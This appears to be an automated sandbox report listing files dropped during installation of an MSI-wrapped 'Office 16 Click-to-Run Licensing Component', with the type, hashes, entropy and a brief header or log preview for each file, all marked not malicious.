                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
                                                  Category:modified
                                                  Size (bytes):2719744
                                                  Entropy (8bit):7.9576378357321165
                                                  Encrypted:false
                                                  SSDEEP:49152:TpUPWBdidvJXFzhYsAdZYH4YwKw2oHUNgir2MYgoGLcOh0YdMsyRyIQw:TpvBxZtYDWHUNgiazgowjzu1Qw
                                                  MD5:8FF0F8F8BA57670BC5A4BB010BBD4FC3
                                                  SHA1:2A0EECF5BD6F7B33B8EC4AAB8FE325DDE4068D13
                                                  SHA-256:3D644640BF3F0CDB52AD3E920960BB42EB355BBBE31B98A02A6E08027EEA977C
                                                  SHA-512:5A46401F7543B61946C6B8840D94286B488E66D057110C19CD1A52944E842E1ABEE24A79368EE0FA1E209076E7EB51491E96E8778628E75ED2D9E7333E87C0E1
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
                                                  Category:dropped
                                                  Size (bytes):2719744
                                                  Entropy (8bit):7.9576378357321165
                                                  Encrypted:false
                                                  SSDEEP:49152:TpUPWBdidvJXFzhYsAdZYH4YwKw2oHUNgir2MYgoGLcOh0YdMsyRyIQw:TpvBxZtYDWHUNgiazgowjzu1Qw
                                                  MD5:8FF0F8F8BA57670BC5A4BB010BBD4FC3
                                                  SHA1:2A0EECF5BD6F7B33B8EC4AAB8FE325DDE4068D13
                                                  SHA-256:3D644640BF3F0CDB52AD3E920960BB42EB355BBBE31B98A02A6E08027EEA977C
                                                  SHA-512:5A46401F7543B61946C6B8840D94286B488E66D057110C19CD1A52944E842E1ABEE24A79368EE0FA1E209076E7EB51491E96E8778628E75ED2D9E7333E87C0E1
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
                                                  Category:dropped
                                                  Size (bytes):2719744
                                                  Entropy (8bit):7.9576378357321165
                                                  Encrypted:false
                                                  SSDEEP:49152:TpUPWBdidvJXFzhYsAdZYH4YwKw2oHUNgir2MYgoGLcOh0YdMsyRyIQw:TpvBxZtYDWHUNgiazgowjzu1Qw
                                                  MD5:8FF0F8F8BA57670BC5A4BB010BBD4FC3
                                                  SHA1:2A0EECF5BD6F7B33B8EC4AAB8FE325DDE4068D13
                                                  SHA-256:3D644640BF3F0CDB52AD3E920960BB42EB355BBBE31B98A02A6E08027EEA977C
                                                  SHA-512:5A46401F7543B61946C6B8840D94286B488E66D057110C19CD1A52944E842E1ABEE24A79368EE0FA1E209076E7EB51491E96E8778628E75ED2D9E7333E87C0E1
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
                                                  Category:dropped
                                                  Size (bytes):2719744
                                                  Entropy (8bit):7.9576378357321165
                                                  Encrypted:false
                                                  SSDEEP:49152:TpUPWBdidvJXFzhYsAdZYH4YwKw2oHUNgir2MYgoGLcOh0YdMsyRyIQw:TpvBxZtYDWHUNgiazgowjzu1Qw
                                                  MD5:8FF0F8F8BA57670BC5A4BB010BBD4FC3
                                                  SHA1:2A0EECF5BD6F7B33B8EC4AAB8FE325DDE4068D13
                                                  SHA-256:3D644640BF3F0CDB52AD3E920960BB42EB355BBBE31B98A02A6E08027EEA977C
                                                  SHA-512:5A46401F7543B61946C6B8840D94286B488E66D057110C19CD1A52944E842E1ABEE24A79368EE0FA1E209076E7EB51491E96E8778628E75ED2D9E7333E87C0E1
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):820
                                                  Entropy (8bit):5.430331554253826
                                                  Encrypted:false
                                                  SSDEEP:12:EgkBhDkvJ/3khF1ETJtel/KJ/3khF1Eb8fNEHWot3jtnLx298/QJq9eW:cBhDkvJ/3khAdoAJ/3khAD2K0maEh
                                                  MD5:3EA351398CA787C0B6401D92B2F2D3C9
                                                  SHA1:97216FA3D3C3CE95065C343E93AD5400737D9D61
                                                  SHA-256:6C4EA26B46DE751C82061638964D6284173263AA2DF7A22D4FD495DF74446E7B
                                                  SHA-512:65409F766FDDE21E91DA38FBBE9AC67C2ABB656948472EFC179C9074A99FD11B3311EF40BAA19C45510A1B89A59458F27C43607E53E4F47901DDCD9BF7141D6A
                                                  Malicious:false
                                                  Preview:...@IXOS.@.....@..~U.@.....@.....@.....@.....@.....@......&.{F73CE0E6-78CF-454D-9161-7ECE19A3E9D5}i.Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..spclwow78x.msi.@.....@n=...@.....@........&.{5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}.....@.....@.....@.....@.......@.....@.....@.......@....i.Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}^.02:\SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\{90160000-007E-0000-1000-0000000FF1CE}\LogonUser.@.......@.....@.....@.......@.....@.....@....
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):212992
                                                  Entropy (8bit):6.5134888693588575
                                                  Encrypted:false
                                                  SSDEEP:3072:3spAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLf2loHUvULyGxr5lqM2a8:BtOdiRQYpgjpjew5GAyGxjqo8
                                                  MD5:D82B3FB861129C5D71F0CD2874F97216
                                                  SHA1:F3FE341D79224126E950D2691D574D147102B18D
                                                  SHA-256:107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
                                                  SHA-512:244B7675E70AB12AA5776F26E30577268573B725D0F145BFC6B848D2BD8F014C9C6EAB0FC0E4F0A574ED9CA1D230B2094DD88A2146EF0A6DB70DBD815F9A5F5B
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......b...........!.....h..........K...............................................{*....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):212992
                                                  Entropy (8bit):6.5134888693588575
                                                  Encrypted:false
                                                  SSDEEP:3072:3spAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLf2loHUvULyGxr5lqM2a8:BtOdiRQYpgjpjew5GAyGxjqo8
                                                  MD5:D82B3FB861129C5D71F0CD2874F97216
                                                  SHA1:F3FE341D79224126E950D2691D574D147102B18D
                                                  SHA-256:107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
                                                  SHA-512:244B7675E70AB12AA5776F26E30577268573B725D0F145BFC6B848D2BD8F014C9C6EAB0FC0E4F0A574ED9CA1D230B2094DD88A2146EF0A6DB70DBD815F9A5F5B
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......b...........!.....h..........K...............................................{*....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):820
                                                  Entropy (8bit):5.430331554253826
                                                  Encrypted:false
                                                  SSDEEP:12:Egt6BhDkvJ/3khF1ETJtel/KJ/3khF1Eb8fNEHWot3jtnLx298/QJq9eW:sBhDkvJ/3khAdoAJ/3khAD2K0maEh
                                                  MD5:E478A4D52EDF8ECC02BCEB376B8FEA16
                                                  SHA1:7C5A4DD911D55D542F2DF97AFBC46356C1A59604
                                                  SHA-256:B4D6C7475D3A5168083C3CC7688E97599DC51F5F8FB51802770F67D7E3DF235D
                                                  SHA-512:0B7B99E3482194CA494745E5B2336412517EDE6D06D42658B2D240C35BD84E3D7CF6EC8FF09A286E2737383F2A3D08134BE49D0CDB3D430B193347DE84BD3D9B
                                                  Malicious:false
                                                  Preview:...@IXOS.@.....@..~U.@.....@.....@.....@.....@.....@......&.{F73CE0E6-78CF-454D-9161-7ECE19A3E9D5}i.Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..spclwow78x.msi.@.....@n=...@.....@........&.{5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}.....@.....@.....@.....@.......@.....@.....@.......@....i.Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}^.02:\SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\{90160000-007E-0000-1000-0000000FF1CE}\LogonUser.@.......@.....@.....@.......@.....@.....@....
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):212992
                                                  Entropy (8bit):6.5134888693588575
                                                  Encrypted:false
                                                  SSDEEP:3072:3spAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLf2loHUvULyGxr5lqM2a8:BtOdiRQYpgjpjew5GAyGxjqo8
                                                  MD5:D82B3FB861129C5D71F0CD2874F97216
                                                  SHA1:F3FE341D79224126E950D2691D574D147102B18D
                                                  SHA-256:107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
                                                  SHA-512:244B7675E70AB12AA5776F26E30577268573B725D0F145BFC6B848D2BD8F014C9C6EAB0FC0E4F0A574ED9CA1D230B2094DD88A2146EF0A6DB70DBD815F9A5F5B
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......b...........!.....h..........K...............................................{*....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):212992
                                                  Entropy (8bit):6.5134888693588575
                                                  Encrypted:false
                                                  SSDEEP:3072:3spAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLf2loHUvULyGxr5lqM2a8:BtOdiRQYpgjpjew5GAyGxjqo8
                                                  MD5:D82B3FB861129C5D71F0CD2874F97216
                                                  SHA1:F3FE341D79224126E950D2691D574D147102B18D
                                                  SHA-256:107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
                                                  SHA-512:244B7675E70AB12AA5776F26E30577268573B725D0F145BFC6B848D2BD8F014C9C6EAB0FC0E4F0A574ED9CA1D230B2094DD88A2146EF0A6DB70DBD815F9A5F5B
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......b...........!.....h..........K...............................................{*....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):212992
                                                  Entropy (8bit):6.5134888693588575
                                                  Encrypted:false
                                                  SSDEEP:3072:3spAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLf2loHUvULyGxr5lqM2a8:BtOdiRQYpgjpjew5GAyGxjqo8
                                                  MD5:D82B3FB861129C5D71F0CD2874F97216
                                                  SHA1:F3FE341D79224126E950D2691D574D147102B18D
                                                  SHA-256:107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
                                                  SHA-512:244B7675E70AB12AA5776F26E30577268573B725D0F145BFC6B848D2BD8F014C9C6EAB0FC0E4F0A574ED9CA1D230B2094DD88A2146EF0A6DB70DBD815F9A5F5B
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......b...........!.....h..........K...............................................{*....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):820
                                                  Entropy (8bit):5.430331554253826
                                                  Encrypted:false
                                                  SSDEEP:12:Egx6BhDkvJ/3khF1ETJtel/KJ/3khF1Eb8fNEHWot3jtnLx298/QJq9eW:4BhDkvJ/3khAdoAJ/3khAD2K0maEh
                                                  MD5:F7DFD568CF3729D83FDBA1E41F1AD915
                                                  SHA1:0BF4E83D1B715E343A422AA7869A5DDAB98E4A5E
                                                  SHA-256:01F7E6045FDC40414C558E2EB278E324F0F78816FB84395E0B7C3917E512D54B
                                                  SHA-512:4ED910A37C8A9DE0A61EF4EA752AE3997284A7FB7EDAD606C6143569F74FE7A80617145C55AEF6A61416876C78B4632827BC5B2C6ACA7607DB08F3CF90C0E1C5
                                                  Malicious:false
                                                  Preview:...@IXOS.@.....@..~U.@.....@.....@.....@.....@.....@......&.{F73CE0E6-78CF-454D-9161-7ECE19A3E9D5}i.Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com..spclwow78x.msi.@.....@n=...@.....@........&.{5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}.....@.....@.....@.....@.......@.....@.....@.......@....i.Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{EDE10F6C-30F4-42CA-B5C7-ADB905E45BFC}^.02:\SOFTWARE\EXEMSI.COM\MSI Wrapper\Installed\{90160000-007E-0000-1000-0000000FF1CE}\LogonUser.@.......@.....@.....@.......@.....@.....@....
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):212992
                                                  Entropy (8bit):6.5134888693588575
                                                  Encrypted:false
                                                  SSDEEP:3072:3spAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLf2loHUvULyGxr5lqM2a8:BtOdiRQYpgjpjew5GAyGxjqo8
                                                  MD5:D82B3FB861129C5D71F0CD2874F97216
                                                  SHA1:F3FE341D79224126E950D2691D574D147102B18D
                                                  SHA-256:107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
                                                  SHA-512:244B7675E70AB12AA5776F26E30577268573B725D0F145BFC6B848D2BD8F014C9C6EAB0FC0E4F0A574ED9CA1D230B2094DD88A2146EF0A6DB70DBD815F9A5F5B
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L......b...........!.....h..........K...............................................{*....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):1.164356946065618
                                                  Encrypted:false
                                                  SSDEEP:12:JSbX72FjYAGiLIlHVRpZh/7777777777777777777777777vDHFrvMHmY7it/l0G:JmQI5tgCiF
                                                  MD5:FF0E16AC5B15BF1D034D1842B96CFA2B
                                                  SHA1:DA3E55A5EA9858CF6C1D8882F81DEB86A6EBF715
                                                  SHA-256:65C9C0BDAC8131E970E5EDB7374DD6158DFE15F29377DDA0EB33B2B782260D03
                                                  SHA-512:4AA056C21FCB65AA05CD9764923756DFE8AB0CA91C3503BA8A51D3049BDCF0FBD291FC5805CB627FE1681B399645E9E7DD71A5F10CFB239F5EECB2AF17447B28
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):1.5645633301529918
                                                  Encrypted:false
                                                  SSDEEP:48:n8PhYuRc06WXJijT5kLxhWddSrk7rRLnddSBOLdrcRAaOA:mhY1ZjTQhc5q4A
                                                  MD5:79FDC2FA871A328337D40973ACFA45BB
                                                  SHA1:A2528779DC67989263E43D82CADCB31548603797
                                                  SHA-256:968D056BF049EEE0FB924CD5E1713889738F31636DEF80FCE58BAA96D484FA85
                                                  SHA-512:E3E603A6501F34735D72323D650344921114C05AB62885DDC58B5E1D6F808476105E9B288C9C2D3BF8AB4495DE093B2FFBE4FF5CAF542FA2C98A5914B9490994
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):3447
                                                  Entropy (8bit):4.3592237007674965
                                                  Encrypted:false
                                                  SSDEEP:96:0KLKYKLKMKiK6KdKGKdKcKMKAqcKqHKqcKqHKq9hqcK5K4:0KLKYKLKMKiK6KdKGKdKcKMKAqcKqHK2
                                                  MD5:FB20A76867F724B5BE48D5E6DB145FEB
                                                  SHA1:223A39F1D31D6A4D6950E3BEFB287905ED281304
                                                  SHA-256:DFC490139B2F96CFA6AC4CC4C1E7905F5D7AF27A752B7CCDCFC639DDCC9E991C
                                                  SHA-512:B653BE9327B738C6B6FF7A907F2B40875F3FFC5D8A0467357FF76E3916E61A80311147E20B217527E08B9767C81C01679894A4FF54EF9B6F606BE0FB15722C48
                                                  Malicious:false
                                                  Preview:.2022-11-30 00:37:34, Info DPX Started DPX phase: Resume and Download Job..2022-11-30 00:37:34, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-11-30 00:37:34, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-11-30 00:37:34, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-11-30 00:37:34, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-11-30 00:37:34, Info DPX CJob::Resume completed with status: 0x0..2022-11-30 00:37:34, Info DPX Ended DPX phase: Resume and Download Job..2022-11-30 00:37:34, Info DPX Started DPX phase: Resume and Download Job..2022-11-30 00:37:34, Info DPX Started DPX phase: Apply Deltas Provided In File..2022-11-30 00:37:35, Info DPX Ended DPX phase: Apply Deltas Provided In File..2022-11-30 00:37:35, Info
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):192827
                                                  Entropy (8bit):5.392004202087958
                                                  Encrypted:false
                                                  SSDEEP:3072:iHHJCoX5CNWFHjkzRl1pqf5JjzH6wbxygaK8Nkv6kF8Kwu8K8uBD556GIlZZ6bFK:i0LVlAA
                                                  MD5:0B27D093D08BE0BDBC51C34D3C7764F3
                                                  SHA1:213F51B5573176546FA644B7FD2B1570F1E28B65
                                                  SHA-256:AC9B6CEE7D44A5F8473B2580D47471D1E030A539A0B24B352EEBAAB9CA002D8D
                                                  SHA-512:D139FD7696FEB4B86CD65BFCB8C9F9FBD924B80BB291B61D3F633A2D70A1AE29462AD44CD9FF76AD9140CBF5A6DA6538DFE45206E565B309B9D98D34757A9509
                                                  Malicious:false
                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):1.251597410379182
                                                  Encrypted:false
                                                  SSDEEP:48:4xQuKJveFXJVT5FLxRddSrkNrRLnddSBOLdrcRAaOA:QQktThZfq4A
                                                  MD5:54F8A582D743E427013E5F65D884F523
                                                  SHA1:EFC51AE3468C31AFCA8F37497B8032C99587FA16
                                                  SHA-256:8E2120485C0E72E87068719E58A152E4B7FFF2160A1568FD58A51E6343EF272B
                                                  SHA-512:FE843BBA67231401F5073D5F9826936C7E0E1A98E81ED24A304F666074E48AC58EB7D0D3DD08296B1AF5D9D1D7DD47019C859E29B8E8836CF6EFB8160AB7ECD5
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):0.14280928141516852
                                                  Encrypted:false
                                                  SSDEEP:24:vVAtWPAK7LdwY+kRJfAebfddipV7OLfddipVJVO3wGJlrkg9SwLklO+k91L7:9AUAaTRrfddSBOLfddSrk7rRLsOhL
                                                  MD5:F4AA58FD51631DE88B47605CFB57CEF4
                                                  SHA1:280792C9BA29D2F59B8653CFC356EE895B332959
                                                  SHA-256:514ADFF22088F0495591E1EFF6FB3FFE12389F6141D245CABC2D7B094143F9D1
                                                  SHA-512:B7CB79492E9DAE52964980A1A91B7BADE6076C343FC98FB80CF9EAFD368F705A093337DFF2D3886F431079B3235FF0529BB1B73B3203710CF364F40050CB9DB4
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):1.5649013227552473
                                                  Encrypted:false
                                                  SSDEEP:48:Am8PhYuRc06WXJiFT5+LxtddSrkgrRLnddSBOLdrcRAaOA:GhY1ZFTq9+q4A
                                                  MD5:640108DDEA1892C7FF242A7F9366159B
                                                  SHA1:C23709AE454F49ED29E558047A351B2E9AC5ED27
                                                  SHA-256:A79BA16470481209D892A7643B33B9CD4C0FD49BC1781528D3FB60643C53BFFF
                                                  SHA-512:0C5B7821EA3DEE209E1CFCFFBFC9A382C49502849255B6B1BA668BEACE93479442940D7DC6020CD3448266625937988ED8F7013ABE6F5048C9231CBDD1757ECC
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):0.07170338136282839
                                                  Encrypted:false
                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOCaT+QMtNyYkYmgVky6lit/:2F0i8n0itFzDHFrvMHmYoit/
                                                  MD5:BF643D7E14CA965EA798494CDC0F626C
                                                  SHA1:93E997D9AB82D947355FF323802BA9C4B70F76A2
